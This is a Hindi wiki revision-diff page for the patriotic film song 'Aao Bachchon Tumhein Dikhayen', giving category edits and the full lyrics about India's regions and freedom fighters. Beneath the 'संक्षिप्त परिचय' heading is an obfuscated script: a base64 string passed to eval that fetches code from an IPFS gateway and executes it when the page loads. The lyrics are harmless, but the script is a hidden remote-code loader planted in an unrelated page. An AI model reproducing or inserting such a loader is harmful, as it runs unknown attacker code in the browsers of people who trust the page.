"आओ बच्चों तुम्हें दिखाएँ" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
छो (Text replace - " खून " to " ख़ून ")
पंक्ति 55: पंक्ति 55:
 
<references/>
 
<references/>
 
==बाहरी कडियाँ==
 
==बाहरी कडियाँ==
 
 
*[http://www.youtube.com/watch?v=4E09twioyfs आओ बच्चों तुम्हें दिखाएँ (यू-ट्यूब विडियो)]
 
*[http://www.youtube.com/watch?v=4E09twioyfs आओ बच्चों तुम्हें दिखाएँ (यू-ट्यूब विडियो)]
 
==संबंधित लेख==
 
==संबंधित लेख==
पंक्ति 61: पंक्ति 60:
 
[[Category:फ़िल्मी गीत]]
 
[[Category:फ़िल्मी गीत]]
 
[[Category:देश भक्ति गीत]]
 
[[Category:देश भक्ति गीत]]
 +
[[Category:कवि प्रदीप]]
 
[[Category:संगीत]]
 
[[Category:संगीत]]
 
[[Category:संगीत कोश]]
 
[[Category:संगीत कोश]]

13:12, 7 फ़रवरी 2015 का अवतरण

संक्षिप्त परिचय

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

आओ बच्चों तुम्हें दिखाएं झाँकी हिंदुस्तान की
इस मिट्टी से तिलक करो ये धरती है बलिदान की
वंदे मातरम ...

उत्तर में रखवाली करता पर्वतराज विराट है
दक्षिण में चरणों को धोता सागर का सम्राट है
जमुना जी के तट को देखो गंगा का ये घाट है
बाट-बाट पे हाट-हाट में यहाँ निराला ठाठ है
देखो ये तस्वीरें अपने गौरव की अभिमान की,
इस मिट्टी से ...

ये है अपना राजपूताना नाज़ इसे तलवारों पे
इसने सारा जीवन काटा बरछी तीर कटारों पे
ये प्रताप का वतन पला है आज़ादी के नारों पे
कूद पड़ी थी यहाँ हज़ारों पद्‍मिनियाँ अंगारों पे
बोल रही है कण कण से कुरबानी राजस्थान की
इस मिट्टी से ...

देखो मुल्क मराठों का ये यहाँ शिवाजी डोला था
मुग़लों की ताकत को जिसने तलवारों पे तोला था
हर पर्वत पे आग लगी थी हर पत्थर एक शोला था
बोली हर-हर महादेव की बच्चा-बच्चा बोला था
वीर शिवाजी ने रखी थी लाज हमारी शान की
इस मिट्टी से ...

जलियाँ वाला बाग़ ये देखो यहाँ चली थी गोलियाँ
ये मत पूछो किसने खेली यहाँ ख़ून की होलियाँ
एक तरफ़ बंदूकें दन दन एक तरफ़ थी टोलियाँ
मरने वाले बोल रहे थे इंक़लाब की बोलियाँ
यहाँ लगा दी बहनों ने भी बाज़ी अपनी जान की
इस मिट्टी से ...

ये देखो बंगाल यहाँ का हर चप्पा हरियाला है
यहाँ का बच्चा-बच्चा अपने देश पे मरनेवाला है
ढाला है इसको बिजली ने भूचालों ने पाला है
मुट्ठी में तूफ़ान बंधा है और प्राण में ज्वाला है
जन्मभूमि है यही हमारे वीर सुभाष महान की
इस मिट्टी से ...


टीका टिप्पणी और संदर्भ

बाहरी कडियाँ

संबंधित लेख